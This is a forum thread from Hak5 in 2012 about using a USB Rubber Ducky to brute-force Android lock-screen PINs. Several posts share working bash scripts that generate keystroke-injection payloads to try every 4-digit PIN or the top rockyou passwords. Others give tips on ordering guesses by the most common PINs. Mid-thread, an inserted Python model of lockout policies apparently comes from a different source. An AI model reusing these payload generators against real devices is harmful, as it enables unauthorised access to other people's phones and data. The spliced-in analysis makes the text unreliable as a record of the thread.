Darren Kitchen Posted December 6, 2012
I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and the recommended setting of a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digits, but that would take 166 hours. 10 digits would take 1902.2 years. ;-)

[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]
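The 16.6-hour figure above worked through as an added example (not code from the post or from Hak5): a small Python model of lock-screen throttling that reproduces the 4- and 5-digit numbers from the post and then shows what an escalating timeout or the wipe-after-N behaviour the post expected (and stock 4.2.1 lacked) does to the same attacker. LockoutPolicy, exhaustion_time and coverage are names assumed here.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class LockoutPolicy:
    """Lock-screen throttling model (constructed for this example, not Android's code)."""
    tries_per_lockout: int            # wrong guesses allowed before each timeout
    lockout_seconds: float            # length of the first timeout
    backoff_factor: float = 1.0       # each later timeout is multiplied by this (1.0 = flat)
    wipe_after: Optional[int] = None  # erase the device after this many wrong guesses


def exhaustion_time(policy, keyspace, seconds_per_try=0.0, horizon_seconds=float("inf")):
    """Simulate an attacker who types every PIN in order.

    Stops when the keyspace is exhausted, a wipe triggers, or the next timeout would
    push past horizon_seconds. Returns (seconds spent, PINs actually tried).
    """
    limit = keyspace if policy.wipe_after is None else min(keyspace, policy.wipe_after)
    elapsed, guesses, timeout = 0.0, 0, policy.lockout_seconds
    while guesses < limit:
        group = min(policy.tries_per_lockout, limit - guesses)
        guesses += group
        elapsed += group * seconds_per_try
        if guesses == limit:
            break                      # no timeout is served after the final guess
        if elapsed + timeout > horizon_seconds:
            break                      # the next lockout outlasts the attacker's window
        elapsed += timeout
        timeout *= policy.backoff_factor
    return elapsed, guesses


def coverage(policy, keyspace):
    """Fraction of the keyspace an unlimited-time attacker can ever try (1.0 = all)."""
    return exhaustion_time(policy, keyspace)[1] / keyspace


STOCK_4_2 = LockoutPolicy(tries_per_lockout=5, lockout_seconds=30)  # behaviour the post observed
BACKOFF = LockoutPolicy(tries_per_lockout=5, lockout_seconds=30, backoff_factor=2.0)
WIPE_100 = LockoutPolicy(tries_per_lockout=5, lockout_seconds=30, wipe_after=100)

if __name__ == "__main__":
    ONE_YEAR = 365 * 24 * 3600
    for name, pol in (("stock 4.2.1", STOCK_4_2), ("doubling timeout", BACKOFF), ("wipe after 100", WIPE_100)):
        # seconds_per_try=1.0 mirrors the DELAY 1000 the payload spends on each PIN
        secs, n = exhaustion_time(pol, 10 ** 4, seconds_per_try=1.0, horizon_seconds=ONE_YEAR)
        print(f"{name:17s} {n:6d} of 10000 PINs tried in {secs / 3600:10.1f} h")
```

With the flat 30-second timeout the waiting alone comes to 59970 s (the 16.6 h in the post, 166 h for 5 digits); a doubling timeout caps the attacker at about a hundred guesses per year and a wipe after 100 wrong guesses leaves 99% of the keyspace unreachable.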
Pwnd2Pwnr Posted December 6, 2012
Darren Kitchen... once again... kicks ass and is like, "Whatevs". Keep on rockin @Darren!
Mr-Protocol Posted December 6, 2012
I sent you a message elsewhere, but figured it would fit here as well. Does this require ADB to be enabled?
Darren Kitchen Posted December 7, 2012
No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loves HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.
Mr-Protocol Posted December 7, 2012
"No, this doesn't require anything special on the Android side. All of these Android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loves HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter."
Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev Teensy, I was one of the lucky ones) next week when I get paid... along with other HakShop goodies :D.
silver-moonshine Posted December 7, 2012
Would this not also be effective on the new Windows 8, when people have the option to change their sign-in password to a PIN? :)
shoeless89 Posted December 9, 2012
I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot!
overwraith Posted December 9, 2012
I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

[CODE]C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Users\UserName\Desktop

07/07/2012  01:03 AM               165 Android Paths.txt
08/30/2012  08:00 PM                50 Android SDK Path.txt
12/09/2012  02:26 PM                63 android_brute-force_0000-9999.txt
               3 File(s)            278 bytes
               0 Dir(s)  831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER

C:\Users\UserName\Desktop>[/CODE]
Edited December 9, 2012 by overwraith
shoeless89 Posted December 11, 2012
So when I plug the Rubber Ducky into my phone it doesn't do anything at all. The light doesn't light up or anything. But when I plug it into my computer I see the inject.bin file and the LEDs on the duck light up. Any ideas?
Xcellerator Posted December 12, 2012
Are you sure that your phone supports a USB keyboard?
no42 Posted December 12, 2012
To adapt Darren's simple script to generate android.txt on OS X, you need MacPorts installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OS X's default bsd-sed.

[CODE]port install gsed[/CODE]
then:
[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]
Not sure what's going wrong with cygwin?
keb0x80 Posted December 12, 2012
I created a script to generate pretty much the same output using only bash loops/conditions

[CODE]#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
    count=$((count+1))
    echo "STRING $pin"
    # After every other pin, do this
    if [ $((count % 2)) -eq 0 ]; then
        echo "DELAY 1000"
        echo "ENTER"
        echo "ENTER"
    fi
    # After 5 pins, do this
    if [ $((count % 5)) -eq 0 ]; then
        for (( delay=0 ; delay < 4 ; delay++ ))
        do
            echo "DELAY 5000"
            echo "ENTER"
        done
    fi
done[/CODE]
shoeless89 Posted December 13, 2012
"Are you sure that your phone supports a USB keyboard?"
No I am not ;/
Totu Posted December 13, 2012
You probably could get a huge performance boost out of this method if you tweaked your PIN list a little. Most common PINs would be any combinations with all the same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try those first, then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't want to remember more than two numbers. Just my two cents.
Kag Posted December 13, 2012
It is kind of odd they didn't lock down the device after a certain number of tries, as pattern lock does that after 20 tries. And once it gets locked down you'll need your Gmail password to unlock. (Which also sort of fails as well because a reboot resets the counter.)
Edited December 13, 2012 by Kag
iamnoxtras Posted December 13, 2012
Hello everybody, I must say that I am surprised that no one (only Totu) suggested using a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to brute-force your way into a device with a PIN you should really use that list, instead of a generated one. Here is the study: http://www.datagenet...september32012/ and here are the first 10 PINs I would try: 1234 1111 0000 1212 7777 1004 2000 4444 2222 6969. 1 in 4 chance of hacking the device in under a minute! What do you say?
Edited December 13, 2012 by iamnoxtras
Pwnd2Pwnr Posted December 13, 2012
My password is.... 1 2 4 4 5 The same one on my luggage...
overwraith Posted December 14, 2012
I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the CYGWIN bin directory in my path variable. Have to use the CYGWIN prompt provided with their software.
CaptainHooligan Posted December 14, 2012
Another good thing to do would be to download the rockyou password list from SkullSecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5-password-then-wait limiter.

** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in Linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.

[CODE]#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""

WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
fi

echo -e "Verifying prerequisites are installed ... "
echo ""

# find prints the full path of the jar; keep only the first match
duckjar=`find / -name duckencode.jar 2>/dev/null | head -n 1`
if [ -z "$duckjar" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
else
    echo "Duckencode.jar prerequisite met."
fi

bundir=`find / -name bzip2 -type f 2>/dev/null | head -n 1`
if [ -z "$bundir" ] ; then
    echo "Bzip2 not found on system. Please verify you have this installed."
    exit 1
else
    echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
    PATH=$PATH:`dirname "$bundir"`   # PATH entries must be directories, not files
fi

wgetdir=`find / -name wget -type f 2>/dev/null | head -n 1`
if [ -z "$wgetdir" ] ; then
    echo "Wget not found on system. Please verify you have this installed."
    exit 1
else
    echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
    PATH=$PATH:`dirname "$wgetdir"`
fi
echo ""
echo ""

#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)

echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 rockyou.txt.bz2   # the bzip2 package provides bunzip2, not bunzip
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar "$duckjar" -i rock-android.txt   # java -jar needs the jar's path; PATH is not searched for jars
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin[/CODE]
Edited December 14, 2012 by CaptainHooligan
barry99705 Posted December 26, 2012
My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number...
DrDinosaur Posted December 27, 2012
Will it continue to go deep into the brute forcing even with a different PIN lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of TouchWiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout?
Xcellerator Posted December 27, 2012
It's not based on the layout of the interface. The payload is based on the manual entry of the pass code by the keyboard, i.e. literally pressing 1-2-3-4. As long as the new models support USB keyboards by default, then I can't see any reason why it wouldn't work.
JDale Posted December 28, 2012
Hi All, I have a Motorola ME863 cell phone and after a few Xmas drinks was a pratt and changed my 4 digit number pass code... and yup you guessed it... promptly forgot the damn thing. Is there anyone in the UK southeast / Berks / Bucks / London area that can help me fix it without having to do a factory reset? Many thanks in advance for all and any help. Rgds JD
JDale Posted December 28, 2012
Just to add, it is the Chinese version (purchased August 2012) and not the USA version so the Gmail backdoor does not work, as China blocks Gmail, Facebook etc.
Xcellerator Posted December 29, 2012
If it has USB keyboard support, get yourself a ducky or a Teensy board, and brute-force it. If it doesn't support USB keyboard, then you're kinda stuck. (As far as I know, anyway...)